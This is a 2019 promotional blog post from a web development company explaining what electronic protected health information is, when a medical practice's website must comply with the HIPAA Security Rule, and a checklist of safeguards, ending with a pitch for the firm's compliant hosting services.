Is your Medical Website HIPAA-Compliant?

by | Jun 17, 2019 | HIPAA

Home » HIPAA » Is your Medical Website HIPAA-Compliant?

HIPAA Security Rule

Download our HIPAA-compliance Infographic

If you’re a medical professional you are probably familiar with HIPAA or the Health Insurance Portability and Accountability Act of 1996 and the HIPAA Privacy Rule. However, are you familiar with the HIPAA Security Rule? The Security Standards for the Protection of Electronic Protected Health Information establish national security standards that protect the electronic transfer of protected health information, also known as e-PHI. As more medical professionals and healthcare offices are building websites online that are collecting PHI, it is important to understand what e-PHI is, how to determine if your site needs to be HIPAA-compliant.  Comit Developers has been building HIPAA compliant websites since 2004 and are experts at all the HIPAA requirements, come learn how we can help your practice stay compliant and drive patients with our SEO services.

What is e-PHI?

According to the U.S. Department of Health & Human Services, Electronic Protected Health Information (e-PHI) refers to “all individually identifiable health information a covered entity creates, receives, maintains or transmits in electronic form.” What does that mean? If you are a practice that transmits any patient data via your medical website, that’s e-PHI.

This can include:

  • Patient names, addresses, phone numbers, social security numbers
  • Patient photographs, X-Rays, MRIs
  • Past medical records
  • Patient payment information and insurance data
  • Patient demographics
  • Tests and lab results

The HIPAA Security Rules outline specifics on how to protect this information and your team at Comit Developers can help you to ensure that your organization stays in compliance.

Does my website need to be HIPAA-compliant?

If you collect any of the above information via your website, yes you need to have a HIPAA-compliant website and you should be protecting PHI.

Ways your medical website may be collecting PHI include:

  • Online scheduling of appointments
  • Contact your doctor with questions
  • Online payments
  • Patient onboarding

The bottom line is if you’re handling any patient data through your website, you MUST have a HIPAA-compliant website or you will be violating the HIPAA Security Rule. Even if you are not collecting patient data, you should highly consider making your website HIPAA-compliant. That’s because sites with HIPAA-compliant website hosting (hosted on servers that meet the requirements of the HIPAA Security Rule) are also more secure, and can prevent hackers from inserting fake forms on the site to collect patient data such as social security numbers.

How do I know if my site meets the standards of the HIPAA Security Rule?

If you can answer yes to all of the questions below, your medical site probably meets the standards of the HIPAA Security Rule.

  • Does your site have automatic backups that are never lost and can be recovered at any time?
  • Is all data transmitted from your site, over the Internet, encrypted?
  • Is your stored data also encrypted?
  • Is your website data accessible only by authorized persons with unique permissions that can be audited?
  • If your site is no longer needed, can it be permanently deleted?\
  • Do you have a HIPAA Business Associate Agreement BAA with the company that currently hosts your website? If not, does the server that hosts your website meet the rules and requirements of the HIPAA Security Rule? Lean more about Comit Developers hipaa compliant web hosting solutions

Ready to learn more about the HIPAA Security Rule?

Comit Developers is well-versed in the requirements surrounding the HIPAA Security Rule and our team has put in countless hours researching the best solutions available in order to provide our healthcare clients with secure, HIPAA-compliant websites. As a result, we have successfully launched many sites for our customers in the medical industry including: doctors, surgeons, dentist, DME and breast pump providers utilizing HIPAA-compliant servers. Our team has extensive training on HIPAA requirements and can help you to stay secure and compliant.

To work with a professional team, well-versed in providing HIPAA-compliant websites, call us at 337-326-5479 to get started!

Schedule a Call

Contact our sales team to schedule a free call to review your options.


Comit Developers has been developing WordPress sites for over 20 years. As a result of several mergers and acquisitions, Comit has emerged as an expert in website design and development for an array of industries. Follow our company blog to learn about our team, our process, and the latest industry news.

Browse by Category